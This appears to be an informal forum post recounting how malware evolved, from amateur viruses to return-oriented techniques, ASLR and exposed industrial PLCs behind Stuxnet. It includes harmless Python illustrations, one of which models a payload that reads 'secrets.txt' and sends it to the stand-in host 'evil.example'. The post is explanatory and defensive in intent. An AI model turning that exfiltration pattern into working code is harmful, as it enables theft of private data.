I've never run antivirus, even when running a small company on an all-Windows setup. We were just careful and didn't fool around on the work machines. We captured a lot of viruses without ever being caught by one, and since it was a software/product dev company, we had the right tools to look inside them. There's been quite an evolution of them. (We went to Linux at some point, running Windows only in VirtualBox or under Soft-ICE, and quit surfing from Windows just in time to miss the drive-by virii from Internet Exploder; in fact we had already quit using it.)
At first, nearly all the viruses we captured were obviously amateur work, written in Borland C, since it was free at the time. Dumb kids even left in the source (e.g., published the debug build) complete with comments. It was more something to laugh at than something to be worried about.
As the years went on, we started to see more serious stuff, built with pro tools. Yes, there are traces left in parts of the binary that tell what compiler was used, unless you very carefully strip them out, and it was obvious some seriously pro programmers were involved. Most of this stuff was financial theft of one kind or another, trying to steal your identity or logins.
Then there were the "return oriented virus" models. Any called routine (and just about everything in any opsys is called at some point) sees its parameters on the stack, including the return address to jump to when the routine is done. By pushing parameters and return addresses of system DLL functions onto the stack, a virus could be built with just about no actual code of its own: just parameters and pointers to system functions that would do the same stuff for ya. Why re-invent the wheel and leave info that makes it easy to detect it's a virus (like explicit calls to file or internet functions)?

During this time, the signature-based AV community came into being. It was no longer enough to look for code patterns, as many of these viruses didn't even really contain code, just a list of parameters and addresses. This approach is at best reactive; it can never catch a zero day, since there has to be a data pattern in the AV database that matches, which can only happen after an attack has been detected, reported, analyzed, and added to the DB. Ow!

It was about this time we switched opsys, since AV code was "eating" our nice shiny machines' cycles too badly, and we wouldn't put up with that. Don't want to start an opsys war here; it could be (though it isn't) just that Linux was a less-attacked target, ignoring the fact that it was derived from an opsys that ran all the campus mainframes and had already lived through much more serious fire than anything else: highly motivated smart students wanting to hack in to change grades, report tuition paid, and so on, an experience most opsys never had to survive.
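The trick is easier to see in miniature. Here's a Python toy (emphatically not a real exploit, and all the routine names are made up): the whole "virus" is just a data structure of pointers and parameters, and the work gets done by "returning into" code that already exists.

```python
# A toy model of the "return oriented" idea: the payload is pure data,
# a list of (existing routine, parameters) pairs, with no new code of
# its own. All names here are hypothetical stand-ins, not real APIs.

def open_file(path):          # stands in for a system DLL routine
    return "opened " + path

def send_net(host, data):     # stands in for another library routine
    return "sent " + data + " to " + host

# The "stack" the virus fakes up: just addresses (function references)
# and parameters, nothing a code-pattern scanner can latch onto.
payload = [
    (open_file, ("secrets.txt",)),
    (send_net, ("evil.example", "contents")),
]

def run_chain(stack):
    """'Return into' each existing routine in turn, as the CPU would."""
    return [fn(*args) for fn, args in stack]

print(run_chain(payload))
```

Notice that nothing in `payload` is executable; a scanner looking for suspicious instructions finds only a table of addresses and arguments.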
At any rate, ASLR (address space layout randomization) kind of helped with ROP (return oriented programming). All modern opsys do it now. But at first, MS opsys didn't, for various reasons, mainly simplicity and speed: they loaded all the DLLs (which are nearly all of Windows itself, as well as any shared libraries) such that they all "looked" like they were in the exact same place every time, using the x86 address relocation hardware to make that illusion work. That saved the cycles of having to find out where, say, the file copy function was in a Windows DLL every time, but it made it possible to write that class of virus.
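You can watch ASLR at work with a small probe; this is a sketch that assumes a platform with ASLR enabled (the modern default). Each fresh process gets its memory laid out at a randomized base, so the same allocation lands at a different address run to run; with ASLR disabled, the same address would come back every time.

```python
# Probe ASLR: ask two brand-new interpreter processes where they put
# an identical heap allocation. Under ASLR the addresses (almost
# always) differ between runs.
import subprocess
import sys

def heap_address():
    # Launch a fresh interpreter and report the address of a new object.
    out = subprocess.run(
        [sys.executable, "-c", "print(id(object()))"],
        capture_output=True, text=True, check=True,
    )
    return int(out.stdout)

a, b = heap_address(), heap_address()
print(hex(a), hex(b))  # with ASLR on, these almost always differ
```

The old fixed-address DLL loading was the opposite: the attacker could hardcode the address of any system routine and count on it being there.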
And now we have our own tax dollars (and those of other countries) being used against us, and the code has gotten really good. When I was in the biz, at first, the number of people who could code that well was small enough that you could actually know all of them. And nothing that wanted security was on the internet, as there wasn't one; I even maintained the ARPA node on the ARPANET, long before these PC things existed. We used phone company leased lines for anything that needed to be secure. They were and are expensive.
So, along comes the wave of MBA types looking to save money, and this new internet thing: now everything could be done over one cable, and believe me, even with an expensive plan it costs a lot less than even a T1 line (even now!). And silly people were allowed to program.
Example: a friend who builds ethanol plants and is an industrial distillation expert used PLCs (programmable logic controllers) to help automate a factory he built for a customer: turn heat up and down, open and close valves, all that kind of thing. He's not really thinking about security; that's not his field, but really, security by obscurity worked out pretty well for a while. No one knew the IP address he put this stuff on, or how to talk to any of it if they did, even though it turns out the guys who built the PLCs in the first place were also clueless about security themselves. Then someone in the C suite wants real-time monitoring of their little money maker. So they tell my pal to assign this to a subnet of the corporate IP namespace, so the CEO and such can see it, and even control it, since by the original design, the only guys who were allowed to see a PLC were the guys who might need to emergency-control it. No thought was given to clueless jerks in the C suite and what they might demand, so there was no read-only interface for them.
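The missing piece in that story, a monitoring view that physically can't issue commands, is simple to sketch. Here's a hypothetical Python model (all names are invented, not any real PLC vendor's API):

```python
# Sketch of the separation the story argues for: operators get a
# control path, everyone else gets a read-only snapshot. All names
# here are hypothetical.

class PLC:
    def __init__(self):
        self._state = {"valve_open": False, "temp_c": 20.0}

    # Control path: only operators should ever reach this.
    def set_valve(self, is_open):
        self._state["valve_open"] = bool(is_open)

    # Monitoring path: values out, no commands in.
    def snapshot(self):
        return dict(self._state)  # a copy; mutating it changes nothing

plc = PLC()
dashboard_view = plc.snapshot()
dashboard_view["valve_open"] = True   # tampering with the copy...
print(plc.snapshot()["valve_open"])   # ...never touches the plant
```

In a real deployment the same split would live at the network layer (the dashboard subnet only ever sees the snapshot endpoint), but the principle is the same: the C suite gets data, not a control surface.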
Heck, PLCs even started having embedded web servers. No one was thinking about anything but how to add some shiny feature to drive more sales. And most programmers get slapped down for mentioning this kind of thing is dangerous, and just do what their technically ignorant boss wants. Got a family to feed. Yeah, it comes down to bucks, for most everything, most times, one way or another, although there's also the principle of "externalizing risk" that makes it even worse. The programmer can say "it's not my fault" because that's what the boss ordered. The boss can say "it's not my fault" because security should be handled by the grunts. So you get this circle jerk of finger pointing, something I may post about here sometime regarding stupid human nature and why things are so messed up because of it.
And now we have power plants and other stuff that can do real harm, with little to no security whatsoever, out where anyone can ping it and send it commands, especially since (as is usual) no one changed the default logins and passwords. And now that this has happened, well, someone thought to go to the PLC manufacturers, buy the service manuals, and have a go; and so we now have Stuxnet and its friends.
Hard to say where this will all lead in the end, but it's something even the security biz pooh-poohed at first, thinking no one in their right mind would expose ANY of this to the internet in the first place; they'd all grown up in the leased-line era.